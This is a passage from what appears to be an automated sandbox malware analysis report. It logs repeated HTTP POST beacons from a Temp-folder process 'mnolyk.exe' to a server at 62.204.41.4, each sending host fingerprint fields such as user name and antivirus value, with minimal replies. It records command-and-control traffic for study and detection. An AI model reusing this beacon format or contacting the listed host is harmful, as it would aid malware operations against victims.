                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.580770016 CET  1070                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      604         192.168.2.7  50333        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:40.754988909 CET  1071                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.820499897 CET  1071                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      605         192.168.2.7  50334        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:41.003923893 CET  1072                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.070502996 CET  1072                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      606         192.168.2.7  50335        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:41.243352890 CET  1073                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.308324099 CET  1073                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      607         192.168.2.7  50336        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:41.486984015 CET  1074                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.549911976 CET  1074                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      608         192.168.2.7  50337        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:41.721827984 CET  1075                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:41.788013935 CET  1075                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      609         192.168.2.7  50338        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:41.974958897 CET  1076                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.040513039 CET  1076                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      61          192.168.2.7  49786        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:12.426489115 CET  499                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.490788937 CET  500                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      610         192.168.2.7  50339        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:42.208795071 CET  1077                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.271629095 CET  1077                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      611         192.168.2.7  50340        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:42.464571953 CET  1078                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.527338982 CET  1078                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      612         192.168.2.7  50341        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:42.838469982 CET  1079                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:42.901577950 CET  1079                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      613         192.168.2.7  50342        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:43.108288050 CET  1080                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:43.174962044 CET  1080                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      614         192.168.2.7  50343        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:43.443139076 CET  1081                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:43.510194063 CET  1081                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      615         192.168.2.7  50344        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:44.257733107 CET  1082                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:44.321942091 CET  1082                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      616         192.168.2.7  50345        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:44.689332962 CET  1083                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:44.752979994 CET  1083                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      617         192.168.2.7  50346        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:45.811034918 CET  1084                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:45.879740953 CET | 1084 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      63 | 192.168.2.7 | 49788 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:12.897780895 CET | 501 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.961004972 CET | 502 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      630 | 192.168.2.7 | 50359 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:49.036581039 CET | 1097 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.107068062 CET | 1097 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      631 | 192.168.2.7 | 50360 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:49.288881063 CET | 1098 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.354939938 CET | 1098 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      632 | 192.168.2.7 | 50361 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
